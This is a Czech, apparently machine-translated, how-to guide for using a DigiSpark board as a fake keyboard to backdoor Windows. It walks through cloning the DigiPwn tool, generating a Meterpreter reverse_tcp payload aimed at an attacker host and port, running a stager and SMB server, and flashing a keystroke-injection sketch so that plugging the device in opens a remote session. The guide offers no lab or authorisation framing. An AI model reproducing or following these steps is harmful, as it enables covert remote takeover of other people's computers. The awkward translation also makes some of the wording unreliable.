Obsah:
2025 Autor: John Day | [email protected]. Naposledy změněno: 2025-01-13 06:57
Co tady tedy děláme?
DigiSpark je malý vývojový nástroj založený na Arduinu, který může fungovat jako vstup HID klávesnice. Dnes manipulujeme s tímto zařízením, abychom backdoorovali operační systém Windows!
Zásoby
Arduino IDE
Stroj na okna
DigiSpark
Metasploit Framework
Python 2.7 (Poznámka: Potřebujete python „2.7“, nechoďte pro žádnou jinou verzi)
impacket
Mozek! To pomáhá
Krok 1: Klonujte úložiště DigiPwn
Klonujte do repo GitHubu od DigiPwn od
klon git
Nyní změňte adresář na DigiPwn od
cd DigiPwn/
Krok 2: Nainstalujte Impacket [Moduly požadované Pythonem]
Tento modul je vyžadován ke spuštění serveru SMB, který je vyžadován pro knihovnu užitečného zatížení
sudo apt-get install python-impacket
Nebo si můžete stáhnout knihovnu impacketů a nainstalovat ji odsud.
Krok 3: Umožňuje generovat užitečné zatížení
Běh
python DigiPwn.py [HOST] [PORT] [VYPLATIT] [VÝSTUPNÍ SOUBOR] [formát]
ex
python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs
Nyní budete dotázáni, zda spustit stager a server SMB. Stiskněte y a stiskněte Enter
Krok 4: Nyní nahrajte kód do Arduina
Než nahrajeme, musíme se ujistit, že je v Arduinu nainstalována deska DigiSpark, abyste se na to mohli podívat zde.
poté nahrajte soubor keystroke_inject.ino vygenerovaný skriptem. Jakmile budete hotovi, jste připraveni
Krok 5: Čas zapojit dítě
Nyní zapojte DigiSpark a počkejte 10 sekund
BOOM Je spuštěna relace měřiče!